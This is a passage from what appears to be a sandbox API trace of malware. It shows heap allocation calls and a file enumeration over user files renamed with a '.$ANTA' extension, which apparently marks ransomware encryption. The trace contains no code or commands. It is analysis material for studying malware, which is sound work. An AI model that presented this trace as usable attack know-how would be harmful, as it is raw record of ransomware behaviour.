(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0091.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0091.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0091.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.398] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.399] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca160 [0091.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0091.400] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.400] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0091.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0091.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.400] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffe243bb, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xffe243bb, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfff2f274, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x8c30, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="5MOGH3JqsJ.bmp.$ANTA", cAlternateFileName="5MOGH3~1.$AN")) returned 1 [0091.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0091.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0091.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.400] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0091.401] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ef0 [0091.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0091.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0091.402] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.402] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0091.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.402] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11f44c, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x11f44c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1453c8, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xca30, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="9TpncYB524P.bmp.$ANTA", cAlternateFileName="9TPNCY~1.$AN")) returned 1 [0091.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0091.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0091.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.402] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.403] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0091.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca160 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0091.404] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.404] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0091.404] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335347, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x335347, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x3cdd27, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x7fd0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="BWdI74zS0.bmp.$ANTA", cAlternateFileName="BWDI74~1.$AN")) returned 1 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0091.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.405] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.405] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0091.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0091.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0091.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca160 [0091.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0091.406] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.406] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.406] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.406] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0091.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.407] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.407] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.407] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.407] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.457] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd45bd980, ftCreationTime.dwHighDateTime=0x1d5e6c6, ftLastAccessTime.dwLowDateTime=0x603183b0, ftLastAccessTime.dwHighDateTime=0x1d5ee5b, ftLastWriteTime.dwLowDateTime=0x603183b0, ftLastWriteTime.dwHighDateTime=0x1d5ee5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="cLIkSZ", cAlternateFileName="")) returned 1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 